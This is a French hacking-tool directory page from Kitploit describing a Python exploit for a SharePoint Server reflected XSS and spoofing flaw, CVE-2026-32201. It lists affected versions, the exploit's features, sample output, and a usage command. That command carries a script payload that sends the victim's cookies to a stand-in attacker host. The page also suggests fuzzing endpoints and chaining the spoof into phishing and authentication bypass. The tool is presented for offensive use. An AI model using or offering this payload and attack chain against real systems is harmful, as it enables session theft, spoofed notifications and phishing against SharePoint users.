Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-32201-exploit — Exploit Python pour CVE-2026-32201, une XSS réfléchie dans Microsoft SharePoint Server, permettant l'usurpation non authentifiée et la modification de données via des requêtes HTTP conçues. | Kitploit
Outils/GitHubGitHub/b1tbit/cve-2026-32201-exploit
Outils de PhishingAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubb1tbit/cve-2026-32201-exploit

CVE-2026-32201-exploit

Exploit Python pour CVE-2026-32201, une XSS réfléchie dans Microsoft SharePoint Server, permettant l'usurpation non authentifiée et la modification de données via des requêtes HTTP conçues.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
16il y a 4 moisPas encore vérifié

Aperçu

Exploit Python pour CVE-2026-32201 - validation d'entrée incorrecte dans Microsoft SharePoint Server, permettant l'usurpation réseau non authentifiée (C:L/I:L).

  • Affecté : SharePoint Server 2016 Enterprise, 2019, Subscription Edition < 16.0.19725.20210 ;
  • Vecteur : AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N ;
  • Impact : Visualiser/modifier des données sensibles via des notifications/documents usurpés.

Fonctionnalités

  1. Empreinte de SharePoint.
  2. POST conçu pour contourner la validation d'entrée (sender_override).
  3. Charge utile personnalisable (expéditeur, destinataire, objet, message avec XSS).
  4. Analyse de la réponse pour vérification.

Utilisation

  1. Enregistrez-le sous exploit.py
  2. Exécutez-le pour créer un fichier de modèle malveillant :
root@kitploit:~
python3 exploit.py https://sharepoint.target.com \
  --recipient [email protected] \
  --sender "[email protected]" \
  --message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
  --endpoint /_layouts/15/notify.aspx

Exemple de sortie :

root@kitploit:~
[+] SharePoint détecté.
[*] Envoi de la requête usurpée à https://target.com/_layouts/15/notify.aspx
[+] Statut : 200
[+] Succès potentiel : Vérifiez les journaux/e-mails de la cible pour le contenu usurpé.

Personnalisation

  • Fuzzing d'endpoint : ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt
  • Charge utile XSS : Ajoutez du JS dans --message pour le vol de cookies
  • Enchaînement : Usurpation → lien de phishing → contournement d'authentification

Vérification

  • Indicateurs de succès : 200 OK + « sent/success » dans la réponse
  • Côté serveur : Vérifiez les journaux ULS/journaux IIS pour les requêtes anormales
  • Impact : Surveillez les e-mails/documents pour un expéditeur falsifié, testez la modification des données
Télécharger l’outil